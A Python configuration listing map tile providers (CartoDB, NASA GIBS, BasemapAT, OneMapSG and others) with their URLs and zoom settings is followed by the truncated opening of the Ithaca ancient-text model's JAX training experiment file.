app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'pedestrian.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.pedestrianDay'
),
pedestrianNight = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'pedestrian.night',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.pedestrianNight'
),
satelliteDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'satellite.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.satelliteDay'
),
terrainDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'terrain.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.terrainDay'
),
terrainDayMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'aerial',
variant = 'terrain.day.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.terrainDayMobile'
)
),
FreeMapSK = TileProvider(
url = 'http://t{s}.freemap.sk/T/{z}/{x}/{y}.jpeg',
min_zoom = 8,
max_zoom = 16,
subdomains = '1234',
bounds = [[47.204642, 15.996093], [49.830896, 22.576904]],
attribution = '(C) OpenStreetMap contributors, vizualization CC-By-SA 2.0 Freemap.sk',
name = 'FreeMapSK'
),
MtbMap = TileProvider(
url = 'http://tile.mtbmap.cz/mtbmap_tiles/{z}/{x}/{y}.png',
attribution = '(C) OpenStreetMap contributors & USGS',
name = 'MtbMap'
),
CartoDB = Bunch(
Positron = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'light_all',
name = 'CartoDB.Positron'
),
PositronNoLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'light_nolabels',
name = 'CartoDB.PositronNoLabels'
),
PositronOnlyLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'light_only_labels',
name = 'CartoDB.PositronOnlyLabels'
),
DarkMatter = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'dark_all',
name = 'CartoDB.DarkMatter'
),
DarkMatterNoLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'dark_nolabels',
name = 'CartoDB.DarkMatterNoLabels'
),
DarkMatterOnlyLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'dark_only_labels',
name = 'CartoDB.DarkMatterOnlyLabels'
),
Voyager = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager',
name = 'CartoDB.Voyager'
),
VoyagerNoLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager_nolabels',
name = 'CartoDB.VoyagerNoLabels'
),
VoyagerOnlyLabels = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager_only_labels',
name = 'CartoDB.VoyagerOnlyLabels'
),
VoyagerLabelsUnder = TileProvider(
url = 'https://{s}.basemaps.cartocdn.com/{variant}/{z}/{x}/{y}{r}.png',
attribution = '(C) OpenStreetMap contributors (C) CARTO',
subdomains = 'abcd',
max_zoom = 19,
variant = 'rastertiles/voyager_labels_under',
name = 'CartoDB.VoyagerLabelsUnder'
)
),
HikeBike = Bunch(
HikeBike = TileProvider(
url = 'https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors',
variant = 'hikebike',
name = 'HikeBike.HikeBike'
),
HillShading = TileProvider(
url = 'https://tiles.wmflabs.org/{variant}/{z}/{x}/{y}.png',
max_zoom = 15,
attribution = '(C) OpenStreetMap contributors',
variant = 'hillshading',
name = 'HikeBike.HillShading'
)
),
BasemapAT = Bunch(
basemap = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 20,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'png',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'geolandbasemap',
name = 'BasemapAT.basemap'
),
grau = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 19,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'png',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmapgrau',
name = 'BasemapAT.grau'
),
overlay = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 19,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'png',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmapoverlay',
name = 'BasemapAT.overlay'
),
highdpi = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 19,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'jpeg',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmaphidpi',
name = 'BasemapAT.highdpi'
),
orthofoto = TileProvider(
url = 'https://maps{s}.wien.gv.at/basemap/{variant}/normal/google3857/{z}/{y}/{x}.{format}',
max_zoom = 20,
attribution = 'Datenquelle: basemap.at',
subdomains = ['', '1', '2', '3', '4'],
format = 'jpeg',
bounds = [[46.35877, 8.782379], [49.037872, 17.189532]],
variant = 'bmaporthofoto30cm',
name = 'BasemapAT.orthofoto'
)
),
nlmaps = Bunch(
standaard = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
variant = 'brtachtergrondkaart',
name = 'nlmaps.standaard'
),
pastel = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
variant = 'brtachtergrondkaartpastel',
name = 'nlmaps.pastel'
),
grijs = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/{variant}/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
variant = 'brtachtergrondkaartgrijs',
name = 'nlmaps.grijs'
),
luchtfoto = TileProvider(
url = 'https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wmts/1.0.0/2016_ortho25/EPSG:3857/{z}/{x}/{y}.png',
min_zoom = 6,
max_zoom = 19,
bounds = [[50.5, 3.25], [54, 7.6]],
attribution = 'Kaartgegevens (C) Kadaster',
name = 'nlmaps.luchtfoto'
)
),
NASAGIBS = Bunch(
ModisTerraTrueColorCR = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 9,
format = 'jpg',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_CorrectedReflectance_TrueColor',
name = 'NASAGIBS.ModisTerraTrueColorCR'
),
ModisTerraBands367CR = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 9,
format = 'jpg',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_CorrectedReflectance_Bands367',
name = 'NASAGIBS.ModisTerraBands367CR'
),
ViirsEarthAtNight2012 = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 8,
format = 'jpg',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'VIIRS_CityLights_2012',
name = 'NASAGIBS.ViirsEarthAtNight2012'
),
ModisTerraLSTDay = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 7,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Land_Surface_Temp_Day',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraLSTDay'
),
ModisTerraSnowCover = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 8,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Snow_Cover',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraSnowCover'
),
ModisTerraAOD = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 6,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Aerosol',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraAOD'
),
ModisTerraChlorophyll = TileProvider(
url = 'https://map1.vis.earthdata.nasa.gov/wmts-webmerc/{variant}/default/{time}/{tilematrixset}{max_zoom}/{z}/{y}/{x}.{format}',
attribution = 'Imagery provided by services from the Global Imagery Browse Services (GIBS), operated by the NASA/GSFC/Earth Science Data and Information System (ESDIS) with funding provided by NASA/HQ.',
bounds = [[-85.0511287776, -179.999999975], [85.0511287776, 179.999999975]],
min_zoom = 1,
max_zoom = 7,
format = 'png',
time = '',
tilematrixset = 'GoogleMapsCompatible_Level',
variant = 'MODIS_Terra_Chlorophyll_A',
opacity = 0.75,
name = 'NASAGIBS.ModisTerraChlorophyll'
)
),
NLS = TileProvider(
url = 'https://nls-{s}.tileserver.com/nls/{z}/{x}/{y}.jpg',
attribution = 'National Library of Scotland Historic Maps',
bounds = [[49.6, -12], [61.7, 3]],
min_zoom = 1,
max_zoom = 18,
subdomains = '0123',
name = 'NLS'
),
JusticeMap = Bunch(
income = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'income',
name = 'JusticeMap.income'
),
americanIndian = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'indian',
name = 'JusticeMap.americanIndian'
),
asian = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'asian',
name = 'JusticeMap.asian'
),
black = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'black',
name = 'JusticeMap.black'
),
hispanic = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'hispanic',
name = 'JusticeMap.hispanic'
),
multi = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'multi',
name = 'JusticeMap.multi'
),
nonWhite = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'nonwhite',
name = 'JusticeMap.nonWhite'
),
white = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'white',
name = 'JusticeMap.white'
),
plurality = TileProvider(
url = 'http://www.justicemap.org/tile/{size}/{variant}/{z}/{x}/{y}.png',
attribution = 'Justice Map',
size = 'county',
bounds = [[14, -180], [72, -56]],
variant = 'plural',
name = 'JusticeMap.plurality'
)
),
Wikimedia = TileProvider(
url = 'https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png',
attribution = 'Wikimedia',
min_zoom = 1,
max_zoom = 19,
name = 'Wikimedia'
),
GeoportailFrance = Bunch(
parcels = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 20,
apikey = 'choisirgeoportail',
format = 'image/png',
style = 'bdparcellaire',
variant = 'CADASTRALPARCELS.PARCELS',
name = 'GeoportailFrance.parcels'
),
ignMaps = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 18,
apikey = 'choisirgeoportail',
format = 'image/jpeg',
style = 'normal',
variant = 'GEOGRAPHICALGRIDSYSTEMS.MAPS',
name = 'GeoportailFrance.ignMaps'
),
maps = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 18,
apikey = 'choisirgeoportail',
format = 'image/jpeg',
style = 'normal',
variant = 'GEOGRAPHICALGRIDSYSTEMS.MAPS.SCAN-EXPRESS.STANDARD',
name = 'GeoportailFrance.maps'
),
orthos = TileProvider(
url = 'https://wxs.ign.fr/{apikey}/geoportail/wmts?REQUEST=GetTile&SERVICE=WMTS&VERSION=1.0.0&STYLE={style}&TILEMATRIXSET=PM&FORMAT={format}&LAYER={variant}&TILEMATRIX={z}&TILEROW={y}&TILECOL={x}',
attribution = 'Geoportail France',
bounds = [[-75, -180], [81, 180]],
min_zoom = 2,
max_zoom = 19,
apikey = 'choisirgeoportail',
format = 'image/jpeg',
style = 'normal',
variant = 'ORTHOIMAGERY.ORTHOPHOTOS',
name = 'GeoportailFrance.orthos'
)
),
OneMapSG = Bunch(
Default = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Default',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Default'
),
Night = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Night',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Night'
),
Original = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Original',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Original'
),
Grey = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'Grey',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.Grey'
),
LandLot = TileProvider(
url = 'https://maps-{s}.onemap.sg/v3/{variant}/{z}/{x}/{y}.png',
variant = 'LandLot',
min_zoom = 11,
max_zoom = 18,
bounds = [[1.56073, 104.11475], [1.16, 103.502]],
attribution = ' New OneMap | Map data (C) contributors, Singapore Land Authority',
name = 'OneMapSG.LandLot'
)
)
)
|
train/experiment.py | deepmind/ithaca | 389 | 12770290 | # Copyright 2021 the Ithaca Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ithaca: Restoring and attributing ancient texts with deep neural networks."""
import bz2
import distutils
import functools
import glob
import os
import pickle
from absl import app
from absl import flags
from absl import logging
import dataloader
from ithaca.models.model import Model
from ithaca.util.alphabet import GreekAlphabet
from ithaca.util.loss import categorical_kl_divergence
from ithaca.util.loss import cross_entropy_label_smoothing_loss
from ithaca.util.loss import cross_entropy_loss
from ithaca.util.loss import cross_entropy_mask_loss
from ithaca.util.loss import date_loss_l1
from ithaca.util.optim import adaptive_grad_clip
from ithaca.util.optim import linear_warmup_and_sqrt_decay
from ithaca.util.optim import linear_weight
from ithaca.util.region_names import load_region_maps
import jax
import jax.numpy as jnp
from jaxline import experiment
from jaxline import platform
from jaxline import utils as jl_utils
import numpy as np
import optax
import tensorflow_datasets.public_api as tfds
FLAGS = flags.FLAGS
class Experiment(experiment.AbstractExperiment):
"""Ithaca experiment."""
# Holds a map from object properties that will be checkpointed to their name
# within a checkpoint. Currently it is assume that these are all sharded
# device arrays.
CHECKPOINT_ATTRS = {
'_params': 'params',
'_opt_state': 'opt_state',
}
def __init__(self, mode, init_rng, config):
"""Initializes experiment."""
super(Experiment, self).__init__(mode=mode)
self.mode = mode
self.init_rng = init_rng
self.config = config
# Same random key on each device.
self._rng_key = jl_utils.bcast_local_devices(self.init_rng)
# Checkpointed experiment state.
self._params = None
self._opt_state = None
# Input pipelines.
self._train_input = None
self._eval_input = None
# Forward and update functions.
self.forward = Model(**self.config.model)
self._update_func = jax.pmap(
self._update_func, axis_name='i', donate_argnums=(0, 1))
self._learning_rate_fn = functools.partial(
linear_warmup_and_sqrt_decay,
max_lr=self.config.optimizer.kwargs.learning_rate,
warmup_steps=self.config.optimizer.warmup)
self._opt_init, self._opt_update = self.optimizer()
if 'use_jit' in self.config.evaluation and self.config.evaluation.use_jit:
self._eval_batch = jax.jit(self._eval_batch)
# Create alphabet
alphabet_kwargs = dict(self.config.alphabet)
wordlist_path = alphabet_kwargs.pop('wordlist_path')
with open(wordlist_path, 'r') as f:
self._alphabet = GreekAlphabet(wordlist_file=f, **alphabet_kwargs)
# Create region mapping
self._region_map = {'main': None, 'sub': None}
if self.config.dataset.region_main_path:
with open(self.config.dataset.region_main_path, 'r') as f:
self._region_map['main'] = load_region_maps(f)
if self.config.dataset.region_sub_path:
with open(self.config.dataset.region_sub_path, 'r') as f:
self._region_map['sub'] = load_region_maps(f)
def optimizer(self):
config_opt = self.config.optimizer
kwargs = config_opt.kwargs.to_dict()
kwargs['learning_rate'] = self._learning_rate_fn
opt = getattr(optax, config_opt.name)(**kwargs)
if hasattr(config_opt, 'clip_adaptive') and config_opt.clip_adaptive:
if config_opt.clip_level > 0.:
opt = optax.chain(adaptive_grad_clip(config_opt.clip_level), opt)
elif config_opt.clip_level > 0.:
opt = optax.chain(optax.clip_by_global_norm(config_opt.clip_level), opt)
return opt
# _ _
# | |_ _ __ __ _(_)_ __
# | __| '__/ _` | | '_ \
# | |_| | | (_| | | | | |
# \__|_| \__,_|_|_| |_|
#
def step(self, global_step, rng, **unused_args):
"""See base class."""
if self._train_input is None:
self._initialize_train(rng)
batch = next(self._train_input)
(self._params, self._opt_state, scalars) = (
self._update_func(self._params, self._opt_state, global_step, batch,
rng))
scalars = jl_utils.get_first(scalars)
return scalars
def _initialize_train(self, rng):
# Check we haven't already restored params
if self._params is None:
logging.info(
'Initializing parameters rather than restoring from checkpoint.')
batch = next(self._build_train_input())
rng = jl_utils.get_first(rng)
params_rng, dropout_rng = jax.random.split(rng)
params_rng = jl_utils.bcast_local_devices(params_rng)
dropout_rng = jl_utils.bcast_local_devices(dropout_rng)
init_net = jax.pmap(
functools.partial(self.forward.init, is_training=True))
self._params = init_net({
'params': params_rng,
'dropout': dropout_rng
},
text_char=batch['text_char'],
text_word=batch['text_word'])
init_opt = jax.pmap(self._opt_init)
self._opt_state = init_opt(self._params)
self._train_input = jl_utils.py_prefetch(self._build_train_input)
self._train_input = jl_utils.double_buffer_on_gpu(self._train_input)
def _build_train_input(self):
"""See base class."""
num_devices = jax.device_count()
global_batch_size = self.config.training.batch_size
per_device_batch_size, ragged = divmod(global_batch_size, num_devices)
logging.info(
'num_devices: %d, per_device_batch_size: %d, global_batch_size: %d',
num_devices, per_device_batch_size, global_batch_size)
if ragged:
raise ValueError(
f'Global batch size {global_batch_size} must be divisible by '
f'num devices {num_devices}')
config_dataset = self.config.dataset
with open(config_dataset.dataset_path) as dataset_file:
ds = dataloader.loader_tf(
per_device_batch_size,
config_dataset,
self._region_map,
alphabet=self._alphabet,
dataset_file=dataset_file,
mode='train')
ds = ds.batch(jax.local_device_count())
return iter(tfds.as_numpy(ds))
def _loss_fn(self, params, batch, global_step, rng):
text_char = batch['text_char']
text_word = batch['text_word']
text_unmasked = batch['text_unmasked']
text_mask = batch['text_mask']
next_sentence_mask = batch['next_sentence_mask']
next_sentence_label = batch['next_sentence_label']
subregion = batch['region_sub_id']
date_min = batch['date_min']
date_max = batch['date_max']
date_dist = batch['date_dist']
date_available = batch['date_available']
eps = 1e-6
(date_pred, subregion_logits, mask_logits, nsp_logits) = self.forward.apply(
params,
text_char=text_char,
text_word=text_word,
text_char_onehot=None,
text_word_onehot=None,
is_training=True,
rngs={'dropout': rng})
date_loss = 0.
subregion_loss = 0.
subregion_accuracy = 0.
mask_loss = 0.
mask_accuracy = 0.
nsp_loss = 0.
nsp_accuracy = 0.
# Date loss
if self.config.loss.date.enabled:
if self.config.loss.date.label_smoothing > 0:
date_dist_prob = jnp.exp(date_dist) # logprob to prob
date_dist_prob_smooth = date_dist_prob * jax.random.uniform(
rng,
shape=date_dist_prob.shape,
dtype=date_dist_prob.dtype,
minval=1 - self.config.loss.date.label_smoothing,
maxval=1 + self.config.loss.date.label_smoothing)
date_dist_prob_smooth /= date_dist_prob_smooth.sum(axis=-1)[:,
jnp.newaxis]
date_dist_prob_smooth = jnp.clip(date_dist_prob_smooth, 1e-6, 1)
date_dist = jnp.log(date_dist_prob_smooth)
date_loss = 0.
if 'l1' in self.config.loss.date.type.split('+'):
date_pred_x = jnp.arange(
self.config.dataset.date_min +
self.config.dataset.date_interval / 2,
self.config.dataset.date_max +
self.config.dataset.date_interval / 2,
self.config.dataset.date_interval).reshape(-1, 1)
date_pred_val = jnp.dot(jax.nn.softmax(date_pred, axis=-1), date_pred_x)
date_loss_l1_ = jax.vmap(date_loss_l1)(date_pred_val, date_min,
date_max, date_available)
jnp.nan_to_num(date_loss_l1_, copy=False)
date_loss += (
jnp.mean(date_loss_l1_, axis=0) * self.config.loss.date.weight_l1)
if 'dist' in self.config.loss.date.type.split('+'):
date_loss_dist_ = categorical_kl_divergence(date_dist, date_pred)
date_loss_dist_ *= date_available
jnp.nan_to_num(date_loss_dist_, copy=False)
date_loss += (
jnp.mean(date_loss_dist_, axis=0) *
self.config.loss.date.weight_dist)
date_loss *= linear_weight(global_step, self.config.loss.date.step_start,
self.config.loss.date.step_end)
# Region and subregion loss
if self.config.loss.region.enabled:
subregion_loss = jnp.mean(
cross_entropy_label_smoothing_loss(
subregion_logits,
subregion,
label_smoothing=self.config.loss.region.label_smoothing), 0)
jnp.nan_to_num(subregion_loss, copy=False)
subregion_loss *= self.config.loss.region.weight
subregion_accuracy = jnp.mean(
jnp.argmax(subregion_logits, -1) == subregion)
w = linear_weight(global_step, self.config.loss.region.step_start,
self.config.loss.region.step_end)
subregion_loss *= w
# Mask loss
if self.config.loss.mask.enabled:
mask_loss = jnp.sum(
cross_entropy_label_smoothing_loss(
mask_logits,
text_unmasked,
text_mask,
label_smoothing=self.config.loss.mask.label_smoothing), 1) # [B]
assert mask_loss.ndim == 1
jnp.nan_to_num(mask_loss, copy=False)
mask_loss = jnp.mean(mask_loss, 0) * self.config.loss.mask.weight # []
mask_all_accuracy = (jnp.argmax(mask_logits, -1) == text_unmasked).astype(
mask_logits.dtype)
mask_accuracy = jnp.divide(
jnp.sum(
jnp.multiply(mask_all_accuracy,
text_mask.astype(mask_logits.dtype))),
jnp.sum(text_mask) + eps)
mask_loss *= linear_weight(global_step, self.config.loss.mask.step_start,
self.config.loss.mask.step_end)
# NSP loss
if self.config.loss.nsp.enabled:
nsp_loss = jnp.sum(
jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits,
next_sentence_label,
next_sentence_mask),
1) # [B]
assert nsp_loss.ndim == 1
